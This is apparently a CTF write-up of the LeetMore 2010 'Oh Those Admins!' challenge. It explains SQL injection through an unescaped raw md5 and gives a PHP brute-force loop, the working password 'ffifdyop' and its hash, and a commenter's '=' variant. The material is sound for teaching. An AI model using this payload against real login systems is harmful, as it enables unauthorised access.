Category: web-vuln?!
http://vos.uz/oh_those_admins/
http://vos.uz/oh_those_admins/index.php.txt
The php script takes a ‘password’ as input, calculates its raw (binary) md5, performs SQL query:
SELECT login FROM admins WHERE password = '$raw_md5'
and if it returns something, gives us full list of admins.
Raw md5 can contain any chars, and script puts them in query as is – it’s an sql injection vuln.
What we have to do is to bruteforce a password which’s raw md5 contains ‘or’1, so that the query looks like
SELECT login FROM admins WHERE password = '<trash>'or'1<shit>'
This will return all the rows, thanks to MySQL converting ‘1<shit>’ from string to int to bool true.
Math tells us there will be a usable hash every 256 ^ 5 / 11 = 99955602525 hashed passwords. With 5kk hashes per sec, you will get a solution in ~ 5.5 hours. That’s not so optimistic, so to speed up bruteforce, we can use different cases of ‘or’: ‘or’, ‘oR’, ‘Or’ and ‘OR’ + we can use its synonim ‘||’. Moreover, we can use all the 1..9 digits instead of just ‘1’. This gives us 45 times faster solution: a usable hash every 5 min.
I used a modified version of John to do the bruteforce, but even a php script will give you what you need in a reasonable time:
<?php for ($i = 0;;) { for ($c = 0; $c < 1000000; $c++, $i++) if (stripos(md5($i, true), '\'or\'') !== false) echo "\nmd5($i) = " . md5($i, true) . "\n"; echo "."; } ?>
I’ve found a password: ffifdyop, with hash: 276f722736c95d99e921722cf9ed621c (‘or’6<trash>).
After logging in, we see the real admin’s password hash in binary: 00071cc0720abd73f61a291224f248d6
And, googling for it or again bruteforcing, we get the answer: 13376843.
More write-ups on “Oh Those Admins!”:
- LEET MORE CTF 2010 write up – Oh Those Admins! [eng] by UNTITLED
- LEET MORE CTF 2010 writeup (oh those admins) [rus] by InVaR
(google-translated to [eng]) - SQL injection with raw MD5 hashes (Leet More CTF 2010 injection 300) [eng] by Kernel Sanders
- leetMore « Oh those Admins! » writeup [fr] by Nibbles
(google-translated to [eng])
1 comment
3 pings
Hey.
Actually, using a hash that contains ” ‘=’ ” will do the job.
The query becomes :
SELECT login FROM admins WHERE password=”=”
which works.
Explanations for ‘a’=’b’=’c’ -> 1 :
‘a’=’b’=’c’ is evaluated in this order : (‘a’=’b’)=’c’.
As ‘a’ != ‘b’, ‘a’=’b’ gives us 0, and that leads us to the final comparison 0=’c’. Then, MySQL tries to cast ‘c’ as a number, and finds 0.
The comparison is now : 0=0, which finally gives us 1.
Thanks for that sweet CTF LeetMore :) see you next year.
[…] En effet j’avais déjà fait une épreuve dans ce genre là au Leetmore CTF (Oh Those Admins). […]
[…] 这里用到的exp为 […]
[…] 这里用到的exp为 […]